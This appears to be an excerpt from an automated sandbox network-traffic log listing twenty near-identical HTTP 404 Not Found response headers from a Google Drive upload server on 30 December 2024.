                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4NPnyuPuo627mGVkIHYHNTODlFAUEb9a1x0vu809gsNT5rPkTzvPWJH-n9S1RBkg4RP9lO9okContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:47 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-7x1LYiQYv-1TRgfMwOCTQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7KLFUzBUDqk6-iriMtdDwqt4tTqbTHSgwjmSN9hg3M_6a2Bpjxw78Yjwoe2JQecEJaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:48 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-_AvqLEvdlrtumAnwbtXgcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7hUXUoJxNf5JNQ-4WeN5jArb5BtSJwve_aYd7OmhZ7VX_h6lVNyKlmiXdDwPZfpyaGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Z4uXlXGUD4Pg68MgaPc0sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7kasKj1-HIRSNKNTgYCaGRvgq23ksbRw6db3M04rBbzf2GJrm3tDctiSsuxruGToDMJkc1RLkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hRjFIFkDEutSfuuEQOcuiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6akkKnpOigftMaCiywablOKUnwStRRSmcJV54lSz-aMG-1atZn4ObKnWZSSE0nG18mSAf3afEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:50 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EdYe7V9LT1smBrek8aYxNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Pd2JZdLN5rxP2YRFlt1z5ZK45_21DhlLbN3VLWNBC2cOchmIhdJFXN24QPs4xBe4RYqqdU_cContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:51 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-oS-mmyYWXisnZt2GA575MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6gTZ1GLjWAi_LNWUp6_920NWYSkqnv_mj1ErfNpW1wyRK9rieehWMOFkUkWHN7aCGzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:51 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-F9H49tN0mxGEXD8F9w8QrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4JtAQ2gGlGyOhTHfM3BPddoL2OrRHWFt48QlE9Q8PnOWeo1omrR8MWOfJzGBPruBx_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:52 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-UyvE_SHWJefABK4uFAfPnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC42zK-9Zkj0LXEoNdxqsVwikXZfQJHsfpVu7Mx-5vRWLKHsEhe8QqqcYmWZi-w73nkIZ6NgONAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:52 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-31ZoMVaTgvf5rIikqJINOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7oYeIExfFFz7ZNX2PkjYysp6pY9NwEDg0wMpFb7-uuZI8clsGofU4cAl4NjiKN6EHvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:55 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-isOe_j6ioAJQ7WAly06a2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4NwifMZmEHphfp9UN4wU4GMRE4HVThdXF3fZv-t6VSK151IgnRxXR-rLT8hFJuvr2IOnMUNxEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:55 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Zu74I3I4jmhFTDayur7sYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5mUzotdv3RyN70bsUnZV5ja2p9Ohzu6jggwqtSvJpnFYrQ9nv0wlw6XJwUx0nsHpXZlsOkemEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:56 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-DvN0uf_UebqjHhNxLnrnFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5n1PMPaafd9RNRz0i04F-jp51ZGFUe2IjWY6Uc6aE0XP8LvaO5ykTv3N1RAIMycw-ZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-srCzE_eNg2l_t1RD-ZG8Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7moJQJ5z6Iadwrcn9eO-tScHtJwi302NMRpFc3DYyzErylAT0RF0glwHQPtmAvOrVGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Vxg2Nnzn978BGN6fMtUsZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6mc2VWXMoauzpyKDVWXyEuRoMX97nSbAhQlcVxyvAWQFXFsRUa3PEX34zL4axQqnurfP0CfdAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-he0L_kENWUKRtxkpNs8jfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC585exS7V1Z7JWd0tPOyjazb13Q59T52u4H4N39Nt8xgxigS2_cWQacv5BQ8FP8d2E0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:59 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-wtnUeU-rC78gT31l6dENfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6hjBmZTql2QpgMf36Z3m_jYTUCj-P6RTCIY_t8n8ZRm8Thm3VIi-SA-S6EEokzVAUHufF0yIcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:59 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-69ejyhKWHaU-IZFje0txeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC43wxTFGryaZ44jby1-dov6rtF4nw6NYS6O-AiUe-a2QUqaoZnI4E10zci_AhnpHoMnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:00 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Sptt28XtNp1l3jR_vTbVHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7QXvsmAJN7IHVDbK0q8d866LU_NSSUkIZU7HZYG8bX2qI0DBTMGDvms3zRPOYTeF92-1ZS54QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:00 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0Mv845j50wSf1CKQUkxzlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6_3v9E3Uv6PltVdxHDqNY53sZ_h9UjqMFqSjVOYSwlSsolWaBAuQnxZfpHCvkqJeBjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:02 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9_dYsm2cApJwMtu1Pcs3FQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
